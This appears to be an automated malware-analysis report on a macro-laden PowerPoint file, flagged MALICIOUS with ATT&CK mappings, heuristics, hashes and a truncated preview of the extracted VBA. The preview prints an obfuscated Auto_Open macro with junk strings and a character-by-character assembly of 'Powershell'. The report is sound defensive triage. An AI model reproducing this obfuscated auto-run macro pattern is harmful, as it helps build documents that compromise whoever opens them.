MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The OOXML file contains a VBA project with an Auto_Open macro, indicating it is designed to execute code when the document is opened. The macro consists mostly of repeated MsgBox calls, likely intended to obscure its real purpose or to hinder automated analysis. No direct payload execution or network communication is evident from the script excerpt provided, but the obfuscated VBA together with the Auto_Open trigger strongly suggests a malicious document intended for initial compromise.
Heuristics (5)
- VBA project inside OOXML (medium; 3 related findings) [OOXML_VBA]: Document contains a VBA project; VBA macros present.
- Auto_Open macro (high) [OLE_VBA_AUTO]: Auto_Open macro.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 9711 bytes
- SHA-256: 53c15a7e5aa3637b26e3372c71ed44133cfcbbe11e34fd4097140c0b7eab062e
- Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s)).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
t = Timer
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
'Save the Workbook before changing cells
'Copy the data
'Define the target Range. 'Save the Workbook before changing cells
'Copy the data
'Selection.FormatConditions(1).StopIfTrue = False
'Define the target Range.
On Error Resume Next
vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA.Tables(1).Delete
vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA.pc
pc.Bookmarks.Add "pc", vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA
'pc pc
'MsgBox ("hLMJQPoEHODc HuuKihiXhbUYGVNPJNszpvYCpbhFy")
'cUIAyKVkKVvApYAhuJoFfhpFYWzJZLJPSdieYiwbHPnQnRUAGudRHMUWpcCCvupBubIfRrNfzPCsRySLbD
'yhBKtrWRtIkZOWGRnAAvyaFaeNKBWdPTYOTXscCAYiKR
Dim DetIofVLJrF, TQYVZUGYRWrP
'AdhaQfweuSpvLLNwapoeQcrDiTC
'zSAfQhZXeDrsWescZH
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
pCEkMJuuYDfsXQBGGHW = "P": FkfCyyXFhdVWiXrcPT = "o": sWeSaDBTEWNWTvkvkfXurMMbLDuDTHw = "w": skULfCDbBOkWPJHsHbbOD = "e": tKAttBJtrtc = "r": yiZdIAPNwbXWB = "s": zKFOUzUceLSWoWkZaHJ = "h": AieAftayYnN = "e": OdbnQB = "l": CYYS = "l":
'WHRrGwGARwMfwnibKrsiHbAvIodBDDBdHiBEUcpnvcODZyPqZUiPZepUiENSMeXnPec
'vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA bvJQRdbptURordynCKZSPNDOWfNHt
'YIQZQstWrPiWuFObNBXFzJUapwrvNzchaWcaiyDJcABuZFMaZskA pc
'SHYRcXBJDYXQfyouLUcINeeKPdNtaPNVWXOZMnrswpiQWdVXUGZdbnfobTcYpekOvHUkJoGsFvyEWoNLkP Zhr
With Selection
.ClearContents
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders
... (truncated)
vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: ppt/vbaProject.bin
- Size: 46592 bytes
- SHA-256: b9c7654c020b0aa3d0759d4ee7a133578132e637a4f7d5ff64f37d1a35df0cd5
- Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 7 long base64-like blob(s)).